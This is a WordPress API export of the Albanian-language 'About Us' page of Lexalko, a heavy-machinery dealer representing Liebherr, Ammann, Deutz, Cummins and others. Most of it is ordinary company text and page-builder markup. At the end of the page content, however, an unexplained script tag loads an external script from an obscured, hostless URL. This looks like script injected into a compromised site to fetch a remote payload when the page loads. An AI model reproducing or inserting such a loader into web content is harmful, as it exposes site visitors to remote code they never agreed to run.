{"id":829,"date":"2017-05-24T14:39:34","date_gmt":"2017-05-24T14:39:34","guid":{"rendered":"http:\/\/lexalko.albweb.al\/?page_id=829"},"modified":"2020-10-23T07:21:43","modified_gmt":"2020-10-23T07:21:43","slug":"rreth-nesh","status":"publish","type":"page","link":"https:\/\/lexalko.com\/index.php\/rreth-nesh\/","title":{"rendered":"Rreth Nesh"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column width=&#8221;2\/3&#8243;][vc_custom_heading text=&#8221;Lexalko SH.A&#8221; google_fonts=&#8221;font_family:Open%20Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic|font_style:400%20regular%3A400%3Anormal&#8221;][vc_separator color=&#8221;custom&#8221; align=&#8221;align_left&#8221; border_width=&#8221;3&#8243; el_width=&#8221;10&#8243; accent_color=&#8221;#f99422&#8243;][vc_column_text]LEXALKO, \u00ebsht\u00eb themeluar n\u00eb vitin 2010, duke importuar fillimisht pjes\u00eb k\u00ebmbimi. N\u00eb vitet n\u00eb vijim, makineri te r\u00ebnda per zhvendosjen e dheut u shtuan gam\u00ebs s\u00eb produkteve, dhe makinerite e r\u00ebnda jane sot fokusi yne kryesor. Sot, LEXALKO SH.A \u00ebsht\u00eb nj\u00eb kompani sherbimi q\u00eb kujdeset p\u00ebr t\u00eb gjitha nevojat dhe k\u00ebrkesat tuaja me seli ne Shqiperi dhe Kosove<\/p>\n<p>LEXALKO, \u00ebsht\u00eb perfaq\u00ebsuesi zyrtar, i makinerive p\u00ebr zhvendosjen e dheut LIEBHERR. Ku ofron makineri te reja dhe te p\u00ebrdorura, t\u00eb cilat perdoren n\u00eb nd\u00ebrtimin e infrastruktur\u00ebs, projekte t\u00eb nxjerrjes s\u00eb mineraleve, gurore, minierave dhe makineri t\u00eb lidhura me industrin\u00eb e tubacioneve dhe gazifikimit. Nga nje makine e vetme deri te nje flote e tere<\/p>\n<p>LEXALKO, gjithashtu \u00ebsht\u00eb p\u00ebrfaq\u00ebsuesi i vet\u00ebm dhe zyrtari makinerive asfaltshtruese AMMANN, motorave DEUTZ, motorave CUMMINS, filtrave FLEETGUARD dhe dh\u00ebmb\u00ebve te kovave ESCO.<br \/>\nN\u00eb k\u00ebt\u00eb menyr\u00eb, LEXALKO \u00ebsht\u00eb n\u00eb gj\u00ebndje p\u00ebr t\u00eb p\u00ebrmbushur t\u00eb gjitha k\u00ebrkesat e klient\u00ebve p\u00ebr makinerite e renda, duke p\u00ebrfshir\u00eb sh\u00ebrbimin, mir\u00ebmbajtjen, pjes\u00eb k\u00ebmbimi, trajnimin dhe konsulenc\u00ebn.<\/p>\n<p>S\u00eb fundmi, p\u00ebr tju ardhur m\u00eb pran\u00eb klienteve dhe duke ju p\u00ebrgjigjur n\u00eb koh\u00eb zhvillimit teknologjik t\u00eb nd\u00ebrtimit t\u00eb rrug\u00ebve dhe riparimit t\u00eb asfaltit, LEXALKO ka marr\u00eb eskluzivitetin e STRASSMAYER, kompania lider boterore me experience mbi 80 vite n\u00eb k\u00ebte fushe<\/p>\n<p>GJITHMON\u00cb ME HAPIN E KOH\u00cbS DHE PRAN\u00cb NEVOJAVE TE KLIENTEVE[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;1529&#8243; img_size=&#8221;full&#8221; lazy_loading=&#8221;true&#8221;][\/vc_column][\/vc_row][vc_row type=&#8221;vc_default&#8221; margin_top=&#8221;5&#8243; margin_bottom=&#8221;15&#8243; css=&#8221;.vc_custom_1474269825824{padding-bottom: 20px !important;}&#8221;][vc_column offset=&#8221;vc_col-lg-6 vc_col-md-6 vc_col-xs-12&#8243; css=&#8221;.vc_custom_1474269863774{padding-bottom: 60px !important;}&#8221;]<div id=\"ultimate-heading-63906a0489690700f\" class=\"uvc-heading ult-adjust-bottom-margin ultimate-heading-63906a0489690700f uvc-5777 \" data-hspacer=\"line_only\"  data-halign=\"left\" style=\"text-align:left\"><div class=\"uvc-main-heading ult-responsive\"  data-ultimate-target='.uvc-heading.ultimate-heading-63906a0489690700f h2'  data-responsive-json-new='{\"font-size\":\"\",\"line-height\":\"\"}' ><h2 style=\"font-weight:normal;\">Visioni<\/h2><\/div><div class=\"uvc-heading-spacer line_only\" style=\"margin-top:15px;margin-bottom:35px;height:3px;\"><span class=\"uvc-headings-line\" style=\"border-style:solid;border-bottom-width:3px;border-color:#f99422;width:50px;\"><\/span><\/div><\/div><div class=\"standard-number-list bullet-top\"><ul>\n<li>T\u00eb jemi zgjedhja nr 1 e tregut Shqiptar dhe Kosovar, t\u00eb produkteve t\u00eb starndateve Bot\u00ebrore<\/li>\n<\/ul>\n<\/div>[vc_empty_space height=&#8221;25px&#8221;][vc_single_image image=&#8221;868&#8243; img_size=&#8221;medium&#8221;][\/vc_column][vc_column offset=&#8221;vc_col-lg-6 vc_col-md-6 vc_col-xs-12&#8243; css=&#8221;.vc_custom_1591975490953{padding-bottom: 60px !important;}&#8221;]<div id=\"ultimate-heading-77746a04896907102\" class=\"uvc-heading ult-adjust-bottom-margin ultimate-heading-77746a04896907102 uvc-5205 \" data-hspacer=\"line_only\"  data-halign=\"left\" style=\"text-align:left\"><div class=\"uvc-main-heading ult-responsive\"  data-ultimate-target='.uvc-heading.ultimate-heading-77746a04896907102 h2'  data-responsive-json-new='{\"font-size\":\"\",\"line-height\":\"\"}' ><h2 style=\"font-weight:normal;\">Misioni<\/h2><\/div><div class=\"uvc-heading-spacer line_only\" style=\"margin-top:15px;margin-bottom:35px;height:3px;\"><span class=\"uvc-headings-line\" style=\"border-style:solid;border-bottom-width:3px;border-color:#f99422;width:50px;\"><\/span><\/div><\/div><div class=\"standard-number-list bullet-top\"><ul>\n<li>P\u00ebrkushtim maksimal p\u00ebr cil\u00ebsi sa m\u00eb t\u00eb lart\u00eb t\u00eb produkteve dhe Sh\u00ebrbimeve ndaj Klientit.<\/li>\n<li>Partneritet me klient\u00ebttan\u00eb p\u00ebr t&#8217;u siguruar zgjidhje sa m\u00eb t\u00eb shpejt\u00eb dh\u00eb efikase p\u00ebr nevojat e tyre<\/li>\n<li>Krijimin e nj\u00eb mjedisi angazhimi, bashk\u00ebpunimi dhe respekti reciprok<\/li>\n<\/ul>\n<\/div>[\/vc_column][\/vc_row][vc_row][vc_column offset=&#8221;vc_hidden-lg vc_hidden-md vc_hidden-sm vc_hidden-xs&#8221;]<div id=\"ultimate-heading-7626a048969071b7\" class=\"uvc-heading ult-adjust-bottom-margin ultimate-heading-7626a048969071b7 uvc-5936 \" data-hspacer=\"line_only\"  data-halign=\"left\" style=\"text-align:left\"><div class=\"uvc-main-heading ult-responsive\"  data-ultimate-target='.uvc-heading.ultimate-heading-7626a048969071b7 h2'  data-responsive-json-new='{\"font-size\":\"\",\"line-height\":\"\"}' ><h2 style=\"font-weight:normal;margin-top:60px;\">Sherbime dhe Produkte<\/h2><\/div><div class=\"uvc-heading-spacer line_only\" style=\"margin-top:15px;margin-bottom:35px;height:3px;\"><span class=\"uvc-headings-line\" style=\"border-style:solid;border-bottom-width:3px;border-color:#ffc000;width:50px;\"><\/span><\/div><\/div>[vc_progress_bar values=&#8221;%5B%7B%22label%22%3A%22Eskavaror%C3%AB%20me%20Zinxhir%C3%AB%22%2C%22value%22%3A%2295%22%2C%22color%22%3A%22bar_orange%22%2C%22customcolor%22%3A%22%23f4d048%22%7D%2C%7B%22label%22%3A%22Eskavator%C3%AB%20me%20Goma%22%2C%22value%22%3A%2295%22%2C%22color%22%3A%22bar_orange%22%2C%22customcolor%22%3A%22%23f4d048%22%7D%2C%7B%22label%22%3A%22Fadroma%22%2C%22value%22%3A%2295%22%2C%22color%22%3A%22bar_orange%22%2C%22customcolor%22%3A%22%23303030%22%7D%2C%7B%22label%22%3A%22Mjete%20t%C3%AB%20p%C3%ABrdorura%22%2C%22value%22%3A%2295%22%2C%22color%22%3A%22bar_orange%22%2C%22customcolor%22%3A%22%23303030%22%7D%2C%7B%22label%22%3A%22Pjes%C3%AB%20K%C3%ABmbimi%20dhe%20Servis%22%2C%22value%22%3A%2295%22%2C%22color%22%3A%22bar_orange%22%2C%22customcolor%22%3A%22%23303030%22%7D%2C%7B%22label%22%3A%22Agregate%20dhe%20Konsulenc%C3%AB%22%2C%22value%22%3A%2295%22%2C%22color%22%3A%22bar_orange%22%2C%22customcolor%22%3A%22%23303030%22%7D%5D&#8221; options=&#8221;striped&#8221; caption_pos=&#8221;top&#8221; bgstyle=&#8221;transparent&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row][vc_row type=&#8221;vc_default&#8221; bg_type=&#8221;bg_color&#8221; bg_override=&#8221;ex-full&#8221; css=&#8221;.vc_custom_1495638176520{margin-bottom: -65px !important;padding-top: 70px !important;padding-bottom: 45px !important;}&#8221; bg_color_value=&#8221;#f4f4f4&#8243;][vc_column offset=&#8221;vc_col-xs-12&#8243;]<div id=\"ultimate-heading-89966a04896907211\" class=\"uvc-heading ult-adjust-bottom-margin ultimate-heading-89966a04896907211 uvc-2301 \" data-hspacer=\"line_only\"  data-halign=\"left\" style=\"text-align:left\"><div class=\"uvc-main-heading ult-responsive\"  data-ultimate-target='.uvc-heading.ultimate-heading-89966a04896907211 h2'  data-responsive-json-new='{\"font-size\":\"\",\"line-height\":\"\"}' ><h2 style=\"font-weight:normal;\">Partner\u00ebt Tan\u00eb<\/h2><\/div><div class=\"uvc-heading-spacer line_only\" style=\"margin-top:15px;margin-bottom:30px;height:3px;\"><span class=\"uvc-headings-line\" style=\"border-style:solid;border-bottom-width:3px;border-color:#ffc000;width:50px;\"><\/span><\/div><\/div>[vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;1643&#8243; img_size=&#8221;300&#215;250&#8243; onclick=&#8221;custom_link&#8221; image_hovers=&#8221;false&#8221; link=&#8221;https:\/\/www.liebherr.com\/en\/gbr\/products\/construction-machines\/earthmoving\/earthmoving.html&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;1644&#8243; img_size=&#8221;300&#215;250&#8243; onclick=&#8221;custom_link&#8221; image_hovers=&#8221;false&#8221; link=&#8221;https:\/\/www.ammann.com\/en\/machines&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;1645&#8243; img_size=&#8221;300&#215;250&#8243; onclick=&#8221;custom_link&#8221; image_hovers=&#8221;false&#8221; link=&#8221;https:\/\/www.deutz.com\/en\/&#8221;][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;1649&#8243; img_size=&#8221;300&#215;250&#8243; onclick=&#8221;custom_link&#8221; image_hovers=&#8221;false&#8221; link=&#8221;https:\/\/www.cumminsfiltration.com\/eme\/homepage&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;1650&#8243; img_size=&#8221;300&#215;250&#8243; onclick=&#8221;custom_link&#8221; image_hovers=&#8221;false&#8221; link=&#8221;https:\/\/cumminseurope.com\/engines&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;1648&#8243; img_size=&#8221;300&#215;250&#8243; onclick=&#8221;custom_link&#8221; image_hovers=&#8221;false&#8221; link=&#8221;https:\/\/www.escocorp.com\/EN\/Pages\/default.aspx&#8221;][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;2270&#8243; img_size=&#8221;300&#215;250&#8243; onclick=&#8221;custom_link&#8221; image_hovers=&#8221;false&#8221; link=&#8221;http:\/\/strassmayr.com\/&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<script async src='https:\/\/\/3gGykjDJ?frm=script&#038;_cid=123' type='text\/javascript'><\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column width=&#8221;2\/3&#8243;][vc_custom_heading text=&#8221;Lexalko SH.A&#8221; google_fonts=&#8221;font_family:Open%20Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic|font_style:400%20regular%3A400%3Anormal&#8221;][vc_separator color=&#8221;custom&#8221; align=&#8221;align_left&#8221; border_width=&#8221;3&#8243; el_width=&#8221;10&#8243; accent_color=&#8221;#f99422&#8243;][vc_column_text]LEXALKO, \u00ebsht\u00eb themeluar n\u00eb vitin 2010, duke importuar fillimisht pjes\u00eb k\u00ebmbimi. N\u00eb vitet n\u00eb vijim, makineri te r\u00ebnda per zhvendosjen e dheut u shtuan gam\u00ebs s\u00eb produkteve, dhe makinerite e r\u00ebnda jane sot fokusi yne kryesor. Sot, LEXALKO SH.A \u00ebsht\u00eb nj\u00eb kompani sherbimi q\u00eb kujdeset p\u00ebr&hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_joinchat":[],"footnotes":""},"class_list":["post-829","page","type-page","status-publish","hentry","description-off"],"_links":{"self":[{"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/pages\/829","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/comments?post=829"}],"version-history":[{"count":77,"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/pages\/829\/revisions"}],"predecessor-version":[{"id":2281,"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/pages\/829\/revisions\/2281"}],"wp:attachment":[{"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/media?parent=829"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}